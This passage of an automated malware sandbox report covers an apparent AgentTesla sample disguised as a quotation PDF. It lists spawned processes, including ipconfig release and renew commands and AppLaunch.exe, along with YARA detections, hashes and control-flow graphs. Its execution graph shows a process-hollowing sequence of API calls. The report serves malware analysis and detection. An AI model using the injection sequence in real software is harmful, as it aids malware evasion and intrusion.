                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383676188.0000000004476000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003462000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:18:55:41
                                                  Start date:19/09/2023
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /release
                                                  Imagebase:0xc60000
                                                  File size:232'960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:18:55:41
                                                  Start date:19/09/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff72b0e0000
                                                  File size:625'664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:18:55:41
                                                  Start date:19/09/2023
                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:ipconfig /release
                                                  Imagebase:0xa40000
                                                  File size:29'184 bytes
                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:18:56:11
                                                  Start date:19/09/2023
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /c ipconfig /renew
                                                  Imagebase:0xc60000
                                                  File size:232'960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:18:56:11
                                                  Start date:19/09/2023
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff72b0e0000
                                                  File size:625'664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:10
                                                  Start time:18:56:12
                                                  Start date:19/09/2023
                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:ipconfig /renew
                                                  Imagebase:0xa40000
                                                  File size:29'184 bytes
                                                  MD5 hash:B0C7423D02A007461C850CD0DFE09318
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:11
                                                  Start time:18:56:17
                                                  Start date:19/09/2023
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                  Imagebase:0xfd0000
                                                  File size:102'568 bytes
                                                  MD5 hash:4DF5F963C7E18F062E49870D0AFF8F6F
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 0000000B.00000002.572091329.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:18.8%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:41.5%
                                                    Total number of Nodes:53
                                                    Total number of Limit Nodes:4
                                                    execution_graph 11767 5c0f9a0 11768 5c0f9b3 11767->11768 11769 5c0f9ba 11767->11769 11768->11769 11771 5c0fa10 11768->11771 11772 5c0fa2d 11771->11772 11773 5c0fa3d 11772->11773 11777 5c812b0 11772->11777 11792 5c812a0 11772->11792 11773->11769 11774 5c0fa69 11774->11769 11779 5c812d1 11777->11779 11778 5c81961 11778->11774 11779->11778 11780 5c80be8 WriteProcessMemory 11779->11780 11781 5c80be0 WriteProcessMemory 11779->11781 11784 5c80a4b SetThreadContext 11779->11784 11785 5c80a50 SetThreadContext 11779->11785 11807 5c80d90 11779->11807 11811 5c80d87 11779->11811 11815 5c811cb 11779->11815 11819 5c811d0 11779->11819 11823 5c80b23 11779->11823 11827 5c80b28 11779->11827 11831 5c80998 11779->11831 11835 5c809a0 11779->11835 11780->11779 11781->11779 11784->11779 11785->11779 11793 5c81269 11792->11793 11794 5c812a3 11792->11794 11793->11774 11794->11793 11795 5c80d90 CreateProcessA 11794->11795 11796 5c80d87 CreateProcessA 11794->11796 11797 5c80a4b SetThreadContext 11794->11797 11798 5c80a50 SetThreadContext 11794->11798 11799 5c80b28 VirtualAllocEx 11794->11799 11800 5c80b23 VirtualAllocEx 11794->11800 11801 5c811cb ReadProcessMemory 11794->11801 11802 5c811d0 ReadProcessMemory 11794->11802 11803 5c80be8 WriteProcessMemory 11794->11803 11804 5c80be0 WriteProcessMemory 11794->11804 11805 5c80998 ResumeThread 11794->11805 11806 5c809a0 ResumeThread 11794->11806 11795->11794 11796->11794 11797->11794 11798->11794 11799->11794 11800->11794 11801->11794 11802->11794 11803->11794 11804->11794 11805->11794 11806->11794 11808 5c80e19 CreateProcessA 11807->11808 11810 5c80fdb 11808->11810 11812 5c80e19 CreateProcessA 11811->11812 11814 5c80fdb 11812->11814 11814->11814 11816 5c811d0 ReadProcessMemory 11815->11816 11818 5c8125f 11816->11818 11818->11779 11820 5c8121b ReadProcessMemory 11819->11820 11822 5c8125f 11820->11822 11822->11779 11824 5c80b28 VirtualAllocEx 11823->11824 11826 5c80ba5 11824->11826 11826->11779 11828 5c80b68 VirtualAllocEx 11827->11828 11830 5c80ba5 11828->11830 11830->11779 11832 5c809e0 ResumeThread 11831->11832 11834 5c80a11 11832->11834 11834->11779 11836 5c809e0 ResumeThread 11835->11836 11838 5c80a11 11836->11838 11838->11779

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 427 5c0e108-5c0e119 429 5c0e129-5c0e12e 427->429 430 5c0e11b-5c0e11e 427->430 431 5c0e120-5c0e128 430->431 432 5c0e12f-5c0e184 430->432 438 5c0e238-5c0e245 432->438 439 5c0e18a-5c0e18d 432->439 440 5c0e193-5c0e196 439->440 441 5c0e246-5c0e250 439->441 443 5c0e25b-5c0e289 440->443 444 5c0e19c-5c0e1a0 440->444 448 5c0e252-5c0e255 441->448 449 5c0e256 441->449 452 5c0e290-5c0e2ca call 5c0d450 443->452 446 5c0e1b0-5c0e1d5 444->446 447 5c0e1a2-5c0e1ab call 5c0d718 444->447 446->452 453 5c0e1db-5c0e1ec 446->453 447->446 449->443 462 5c0e2cc-5c0e2ee 452->462 463 5c0e2ef-5c0e338 452->463 453->452 454 5c0e1f2-5c0e20a 453->454 454->452 457 5c0e210-5c0e228 454->457 457->452 459 5c0e22a-5c0e237 457->459 469 5c0e4c1-5c0e4fc 463->469 470 5c0e33e-5c0e343 463->470 494 5c0e51a-5c0e526 469->494 495 5c0e4fe-5c0e50d 469->495 471 5c0e478-5c0e48b 470->471 472 5c0e349-5c0e34c 470->472 473 5c0e352-5c0e366 call 5c0e2a8 472->473 474 5c0e48c-5c0e4ba 472->474 481 5c0e368-5c0e36f 473->481 482 5c0e37e-5c0e380 473->482 474->469 483 5c0e371 481->483 484 5c0e376-5c0e37d 481->484 485 5c0e391-5c0e395 482->485 486 5c0e382-5c0e389 482->486 483->484 489 5c0e3a0-5c0e3a7 485->489 490 5c0e397-5c0e39e 485->490 486->485 496 5c0e3b1-5c0e3b4 489->496 490->489 492 5c0e3b6-5c0e3e6 490->492 497 5c0e3e9-5c0e403 492->497 511 5c0e532-5c0e535 494->511 512 5c0e528-5c0e52a 494->512 500 5c0e53f-5c0e542 495->500 501 5c0e50f-5c0e511 495->501 496->497 503 5c0e451-5c0e453 497->503 504 5c0e405-5c0e407 497->504 505 5c0e544-5c0e547 500->505 506 5c0e575-5c0e579 500->506 507 5c0e513-5c0e516 501->507 508 5c0e565-5c0e574 call 5c0e2a8 501->508 513 5c0e455-5c0e46a 503->513 514 5c0e46d-5c0e477 503->514 516 5c0e409-5c0e42a 504->516 517 5c0e42d-5c0e435 504->517 518 5c0e612-5c0e640 505->518 519 5c0e54d-5c0e564 call 5c0e2a8 505->519 509 5c0e589-5c0e5ae 506->509 510 5c0e57b-5c0e584 call 5c0d718 506->510 507->494 507->518 524 5c0e5b4-5c0e5c5 509->524 525 5c0e647 509->525 510->509 523 5c0e60d 511->523 526 5c0e53b-5c0e53e 511->526 522 5c0e530 512->522 512->523 513->514 516->517 528 5c0e437-5c0e439 517->528 529 5c0e43b 517->529 518->525 522->526 523->518 524->525 533 5c0e5cb-5c0e5e3 524->533 537 5c0e649-5c0e658 525->537 535 5c0e43d-5c0e43f 528->535 529->535 533->525 538 5c0e5e5-5c0e5fd 533->538 539 5c0e441-5c0e445 call 5c0d718 535->539 540 5c0e44a-5c0e44f 535->540 537->537 541 5c0e65a-5c0e66d 537->541 538->525 543 5c0e5ff-5c0e60c 538->543 539->540 540->503 540->504 546 5c0e701-5c0e75a 541->546 547 5c0e673-5c0e680 call 5c0e2a8 541->547 568 5c0e764-5c0e768 546->568 569 5c0e75c-5c0e763 546->569 553 5c0e682-5c0e68d 547->553 554 5c0e68e-5c0e690 547->554 555 5c0e6a1-5c0e6a4 554->555 556 5c0e692-5c0e699 554->556 558 5c0e6b1-5c0e6cd 555->558 559 5c0e6a6-5c0e6ac call 5c0d718 555->559 556->555 564 5c0e6dd-5c0e700 558->564 565 5c0e6cf-5c0e6d1 558->565 559->558 567 5c0e6da 565->567 567->564 570 5c0e776-5c0e77b 568->570 571 5c0e76a-5c0e775 568->571 572 5c0e7aa-5c0e7b9 570->572 573 5c0e77d-5c0e7a8 570->573 576 5c0e7c0-5c0e7c8 572->576 577 5c0e7bb-5c0e7be 572->577 579 5c0e7cf-5c0e7d6 573->579 576->579 577->579
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: f5q$(4q
                                                    • API String ID: 0-1535645079
                                                    • Opcode ID: c93e6f7cabd6ab8e54bf860bb1ae234af9fd49e031f5bcd9546d74619dc0b0c3
                                                    • Instruction ID: 92e491a697f645f1c577bdfa3e0f00295b9ee4c4cc9763a843f36d852a9384c6
                                                    • Opcode Fuzzy Hash: c93e6f7cabd6ab8e54bf860bb1ae234af9fd49e031f5bcd9546d74619dc0b0c3
                                                    • Instruction Fuzzy Hash: EB22EF317043158FCB25DB69D49466ABBFBFFC5210B189D6EE14AC7B85DB31E8028B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 582 5c013a8-5c013c2 583 5c013c4-5c013cb 582->583 584 5c013ce-5c013da 582->584 586 5c01436-5c01439 584->586 587 5c013dc-5c013e9 584->587 588 5c0143b-5c0143d 586->588 589 5c0144c-5c0144f 586->589 594 5c01607-5c0161f 587->594 595 5c013ef-5c0141f 587->595 593 5c01445 588->593 591 5c01451-5c0146f 589->591 592 5c01475-5c01478 589->592 591->592 601 5c01646-5c01664 591->601 596 5c015fd-5c01604 592->596 597 5c0147e-5c01484 592->597 593->589 611 5c01625-5c0163f 594->611 624 5c01421-5c0142a 595->624 625 5c0142c-5c0142f 595->625 597->596 599 5c0148a-5c01493 597->599 604 5c01495-5c014a4 599->604 605 5c014cb-5c014d1 599->605 601->611 617 5c01666-5c01691 601->617 604->605 616 5c014a6-5c014bf 604->616 609 5c014d7-5c014e0 605->609 610 5c015dc-5c015e2 605->610 609->610 622 5c014e6-5c014f2 609->622 610->596 613 5c015e4-5c015f4 610->613 611->601 613->596 627 5c015f6-5c015fb 613->627 616->605 628 5c014c1-5c014c4 616->628 633 5c01693-5c016a0 617->633 634 5c016ca-5c016cc 617->634 631 5c01590-5c015d4 622->631 632 5c014f8-5c01520 622->632 624->586 625->586 627->596 628->605 631->610 632->631 646 5c01522-5c0155f 632->646 633->634 639 5c016a2-5c016c8 633->639 635 5c01b17-5c01b1e 634->635 639->634 651 5c016d1-5c01705 639->651 646->631 658 5c01561-5c0158e 646->658 659 5c017a8-5c017b7 651->659 660 5c0170b-5c01714 651->660 658->610 668 5c017f6 659->668 669 5c017b9-5c017cf 659->669 661 5c0171a-5c0172d 660->661 662 5c01b1f-5c01b2b 660->662 671 5c01796-5c017a2 661->671 672 5c0172f-5c01748 661->672 670 5c017f8-5c017fd 668->670 678 5c017d1-5c017ed 669->678 679 5c017ef-5c017f4 669->679 673 5c01840-5c0185c 670->673 674 5c017ff-5c01820 670->674 671->659 671->660 672->671 691 5c0174a-5c01758 672->691 683 5c01862-5c0186b 673->683 684 5c01924-5c0192d 673->684 674->673 695 5c01822 674->695 678->670 679->670 683->662 689 5c01871-5c0188e 683->689 687 5c01933 684->687 688 5c01b15 684->688 692 5c01941-5c0194f 687->692 693 5c0193a-5c0193c 687->693 694 5c0199e-5c019ac 687->694 688->635 710 5c01912-5c0191e 689->710 711 5c01894-5c018aa 689->711 691->671 701 5c0175a-5c0175e 691->701 702 5c01951-5c01959 692->702 703 5c01967-5c0196e 692->703 693->635 705 5c019c4-5c019db 694->705 706 5c019ae-5c019b6 694->706 697 5c01825-5c0183e 695->697 697->673 701->662 708 5c01764-5c0177d 701->708 702->703 703->635 718 5c019f3-5c01a06 705->718 719 5c019dd-5c019e5 705->719 706->705 708->671 722 5c0177f-5c01793 708->722 710->683 710->684 711->710 725 5c018ac-5c018ba 711->725 727 5c01a08-5c01a10 718->727 728 5c01a1e-5c01a3b 718->728 719->718 722->671 725->710 733 5c018bc-5c018c0 725->733 727->728 738 5c01a53 728->738 739 5c01a3d-5c01a45 728->739 733->662 734 5c018c6-5c018ef 733->734 734->710 743 5c018f1-5c0190f 734->743 738->635 739->738 743->710
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Pl0q$$0q
                                                    • API String ID: 0-4031184341
                                                    • Opcode ID: 5166b828899e1ca02b69c53d92fb201fbb67d7065f0fa6d8b68cd47fb3db678a
                                                    • Instruction ID: 4ea743b4d041ac31e93e7e320f1dfd408263cab92f6097832bcac6a09a061f5c
                                                    • Opcode Fuzzy Hash: 5166b828899e1ca02b69c53d92fb201fbb67d7065f0fa6d8b68cd47fb3db678a
                                                    • Instruction Fuzzy Hash: 25224834B002058FCB14DF69C984A6ABBF6FF89710B1998A9E506DB3B1DB31ED41CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44b544ab18eac2be3fc97f91852e8e5d9f7b87a385d65aec08580334d661d075
                                                    • Instruction ID: f27ed7557a0364c6d06c560428767dd5da1c8783f889a2647907c2f7d8e82a4b
                                                    • Opcode Fuzzy Hash: 44b544ab18eac2be3fc97f91852e8e5d9f7b87a385d65aec08580334d661d075
                                                    • Instruction Fuzzy Hash: 41129035B002159FCB19EBA9C954B6EBBF7FFC8204F298569D406AB394DE319D02C784
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383948597.0000000005C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c80000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29dea5ea1e57e5148ca62bacdcbdfc5c3c44a696a2647fd342df6fa15d331d6b
                                                    • Instruction ID: 960c1571f5aa62c8841dea9fc4f980fd101bbd219dd609b15bc5e1436393a2ae
                                                    • Opcode Fuzzy Hash: 29dea5ea1e57e5148ca62bacdcbdfc5c3c44a696a2647fd342df6fa15d331d6b
                                                    • Instruction Fuzzy Hash: 25129034B002159FDB19EBA9C954B6EBBF7BFC8704F298529D406AB394DE319D02C784
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 5c07f70-5c07f86 1 5c084a2-5c084d8 0->1 2 5c07f8c-5c07f93 0->2 23 5c08495-5c0849b 1->23 24 5c084da-5c08504 1->24 3 5c07f99-5c07fa7 2->3 4 5c0813c-5c08143 2->4 7 5c08036-5c08047 3->7 8 5c07fad-5c07fe5 3->8 13 5c08144-5c08148 7->13 14 5c0804d-5c08051 7->14 8->7 71 5c07fe7-5c0802d 8->71 16 5c0839d 13->16 17 5c0814e-5c08152 13->17 19 5c08306-5c0830a 14->19 20 5c08057-5c0805b 14->20 29 5c083a7-5c083d7 16->29 25 5c08158-5c0815f 17->25 26 5c0821e-5c08222 17->26 21 5c08322-5c08334 19->21 22 5c0830c-5c08312 19->22 27 5c08280-5c08284 20->27 28 5c08061-5c08065 20->28 61 5c08336-5c08346 21->61 62 5c0837f 21->62 31 5c08314 22->31 32 5c08316-5c08320 22->32 23->1 33 5c0850c-5c0851b 24->33 34 5c08507 call 5c07f70 24->34 25->29 35 5c08165-5c08169 25->35 36 5c08224-5c0822a 26->36 37 5c0823a-5c0824c 26->37 38 5c08286-5c0828c 27->38 39 5c0829c-5c082ae 27->39 28->29 30 5c0806b-5c0806f 28->30 86 5c083de-5c083e2 29->86 41 5c08071-5c08077 30->41 42 5c08087-5c08099 30->42 31->21 32->21 64 5c08538-5c0854d 33->64 65 5c0851d-5c08536 33->65 34->33 43 5c08181 35->43 44 5c0816b-5c08171 35->44 45 5c0822c 36->45 46 5c0822e-5c08238 36->46 69 5c08265 37->69 70 5c0824e-5c08263 37->70 49 5c08290-5c0829a 38->49 50 5c0828e 38->50 73 5c082b0-5c082c0 39->73 74 5c082f9 39->74 52 5c08079 41->52 53 5c0807b-5c08085 41->53 76 5c08393 42->76 77 5c0809f-5c080af 42->77 56 5c08183-5c08193 43->56 54 5c08173 44->54 55 5c08175-5c0817f 44->55 45->37 46->37 49->39 50->39 52->42 53->42 54->43 55->43 89 5c08276-5c0827b 56->89 90 5c08199-5c081a9 56->90 93 5c08348-5c08358 61->93 94 5c0835a-5c08379 61->94 67 5c08384-5c08387 62->67 78 5c085a3-5c085cc 64->78 65->64 116 5c0854f-5c08568 65->116 79 5c08134-5c08136 67->79 84 5c0826a 69->84 70->84 71->7 159 5c0802f 71->159 95 5c082c2-5c082d2 73->95 96 5c082d4-5c082f3 73->96 82 5c082fe-5c08301 74->82 76->16 106 5c080b1-5c080c1 77->106 107 5c080c7-5c080dd 77->107 98 5c085d2-5c085d9 78->98 79->4 79->86 82->79 100 5c08272-5c08274 84->100 102 5c083e4-5c083eb 86->102 103 5c083ed-5c08432 86->103 101 5c081fa-5c081ff 89->101 90->89 117 5c081af-5c081bb 90->117 93->94 120 5c0837b-5c0837d 93->120 94->67 95->96 123 5c082f5-5c082f7 95->123 96->82 100->101 101->79 113 5c08205-5c08213 101->113 102->103 111 5c08439-5c08494 102->111 103->111 106->107 131 5c0838c-5c0838e 106->131 135 5c080e6-5c080eb 107->135 111->23 113->56 129 5c08219 113->129 116->78 127 5c0856a-5c0857a 116->127 139 5c081e5-5c081f1 117->139 140 5c081bd-5c081cd 117->140 120->67 123->82 127->78 143 5c0857c-5c08595 127->143 129->79 131->135 135->79 144 5c080ed-5c080f1 135->144 139->101 140->139 158 5c081cf-5c081df 140->158 143->78 166 5c08597-5c0859a 143->166 147 5c080f3-5c080f9 144->147 148 5c080ff-5c08101 144->148 154 5c080fb 147->154 155 5c080fd 147->155 156 5c08103-5c0812d 148->156 157 5c0812f 148->157 154->148 155->148 156->79 156->157 157->79 158->100 158->139 159->7 166->78
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $(4q$XR5q
                                                    • API String ID: 0-3406074314
                                                    • Opcode ID: 146f20c179f2193360f8e1e64981c357b23d655b08171534b452f1b9447345c4
                                                    • Instruction ID: 1d0149f98c0861750f27e83638ac72430e7f5917ab108023c24175b576311e91
                                                    • Opcode Fuzzy Hash: 146f20c179f2193360f8e1e64981c357b23d655b08171534b452f1b9447345c4
                                                    • Instruction Fuzzy Hash: E12232797145108FCB58DB29C898A297BF2FF89715B2598A9E506CF3B1CB31ED42CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 172 5c03878-5c038a0 174 5c038a2-5c038e9 172->174 175 5c038ee-5c038fc 172->175 221 5c03d45-5c03d4c 174->221 176 5c0390b 175->176 177 5c038fe-5c03909 call 5c01668 175->177 180 5c0390d-5c03914 176->180 177->180 182 5c0391a-5c0391e 180->182 183 5c039fd-5c03a01 180->183 187 5c03924-5c03928 182->187 188 5c03d4d-5c03d75 182->188 184 5c03a03-5c03a12 183->184 185 5c03a57-5c03a61 183->185 200 5c03a16-5c03a1b 184->200 189 5c03a63-5c03a72 185->189 190 5c03a9a-5c03ac0 185->190 191 5c0393a-5c03998 call 5c013a8 call 5c01e10 187->191 192 5c0392a-5c03934 187->192 197 5c03d7c-5c03da6 188->197 203 5c03a78-5c03a95 189->203 204 5c03dae-5c03dc4 189->204 216 5c03ac2-5c03acb 190->216 217 5c03acd 190->217 230 5c03e0b-5c03e35 191->230 231 5c0399e-5c039f8 191->231 192->191 192->197 197->204 205 5c03a14 200->205 206 5c03a1d-5c03a52 call 5c03340 200->206 203->221 232 5c03dcc-5c03e04 204->232 205->200 206->221 220 5c03acf-5c03af7 216->220 217->220 236 5c03bc8-5c03bcc 220->236 237 5c03afd-5c03b16 220->237 242 5c03e37-5c03e3d 230->242 243 5c03e3f-5c03e45 230->243 231->221 232->230 240 5c03c46-5c03c50 236->240 241 5c03bce-5c03be7 236->241 237->236 263 5c03b1c-5c03b2b 237->263 245 5c03c52-5c03c5c 240->245 246 5c03cad-5c03cb6 240->246 241->240 268 5c03be9-5c03bf8 241->268 242->243 249 5c03e46-5c03e83 242->249 261 5c03c62-5c03c74 245->261 262 5c03c5e-5c03c60 245->262 251 5c03cb8-5c03ce6 call 5c00ba0 call 5c00bc0 246->251 252 5c03cee-5c03d3b 246->252 251->252 272 5c03d43 252->272 269 5c03c76-5c03c78 261->269 262->269 282 5c03b43-5c03b58 263->282 283 5c03b2d-5c03b33 263->283 287 5c03c10-5c03c1b 268->287 288 5c03bfa-5c03c00 268->288 270 5c03ca6-5c03cab 269->270 271 5c03c7a-5c03c7e 269->271 270->245 270->246 278 5c03c80-5c03c99 271->278 279 5c03c9c-5c03c9f 271->279 272->221 278->279 279->270 285 5c03b5a-5c03b86 282->285 286 5c03b8c-5c03b95 282->286 289 5c03b35 283->289 290 5c03b37-5c03b39 283->290 285->232 285->286 286->230 294 5c03b9b-5c03bc2 286->294 287->230 297 5c03c21-5c03c44 287->297 295 5c03c02 288->295 296 5c03c04-5c03c06 288->296 289->282 290->282 294->236 294->263 295->287 296->287 297->240 297->268
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H4q$H4q$H4q
                                                    • API String ID: 0-4271027141
                                                    • Opcode ID: 60a7f684203a448f417b968632ec04bbc049d490c74d3a1103d0c5774d9687ef
                                                    • Instruction ID: 7e2f1b1d2586107ec4d635972719990d27167f37620d1ab7249406a56be1eb95
                                                    • Opcode Fuzzy Hash: 60a7f684203a448f417b968632ec04bbc049d490c74d3a1103d0c5774d9687ef
                                                    • Instruction Fuzzy Hash: A8126F35A102059FCB25DFA9C594A6EBBF2FF88700F14892DD4069B3A4DB35ED46CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 308 5c05528-5c05565 310 5c05587-5c0559d call 5c05330 308->310 311 5c05567-5c0556a 308->311 317 5c05913-5c05927 310->317 318 5c055a3-5c055af 310->318 422 5c0556c call 5c05e40 311->422 423 5c0556c call 5c05e31 311->423 424 5c0556c call 5c05e98 311->424 314 5c05572-5c05574 314->310 315 5c05576-5c0557e 314->315 315->310 328 5c05967-5c05970 317->328 319 5c056e0-5c056e7 318->319 320 5c055b5-5c055b8 318->320 323 5c05816-5c0590a call 5c04d38 * 2 319->323 324 5c056ed-5c056f6 319->324 321 5c055bb-5c055c4 320->321 326 5c05a08 321->326 327 5c055ca-5c055de 321->327 323->317 324->323 329 5c056fc-5c05808 call 5c04d38 call 5c052c8 call 5c04d38 324->329 336 5c05a0d-5c05a11 326->336 345 5c056d0-5c056da 327->345 346 5c055e4-5c05679 call 5c05330 * 2 call 5c04d38 call 5c052c8 call 5c05370 call 5c05418 call 5c05480 327->346 330 5c05972-5c05979 328->330 331 5c05935-5c0593e 328->331 419 5c05813-5c05814 329->419 420 5c0580a 329->420 334 5c059c7-5c059ce 330->334 335 5c0597b-5c059be call 5c04d38 330->335 331->326 338 5c05944-5c05956 331->338 339 5c059d0-5c059e0 334->339 340 5c059f3-5c05a06 334->340 335->334 343 5c05a13 336->343 344 5c05a1c 336->344 355 5c05966 338->355 356 5c05958-5c0595d 338->356 339->340 357 5c059e2-5c059ea 339->357 340->336 343->344 354 5c05a1d 344->354 345->319 345->321 399 5c05698-5c056cb call 5c05480 346->399 400 5c0567b-5c05693 call 5c05418 call 5c04d38 call 5c04fe8 346->400 354->354 355->328 425 5c05960 call 5c07cc0 356->425 426 5c05960 call 5c07cd0 356->426 357->340 399->345 400->399 419->323 420->419 422->314 423->314 424->314 425->355 426->355
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.383923882.0000000005C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C00000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 4'0q$4'0q$4'0q
                                                    • API String ID: 0-2797774833
                                                    • Opcode ID: da15abeac484cb1d2fd3e88494096b27b122f4dfc129f388be3697f7ccc07f16
                                                    • Instruction ID: d16c9e16bc760daec3cc4671a6d1b73c42255a13618b312255428508192b32b4
                                                    • Opcode Fuzzy Hash: da15abeac484cb1d2fd3e88494096b27b122f4dfc129f388be3697f7ccc07f16
                                                    • Instruction Fuzzy Hash: E7F1DA34A10218DFCB18DFA4D998A9DBBB2FF88300F559558E406AB3A5CB75EC42CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
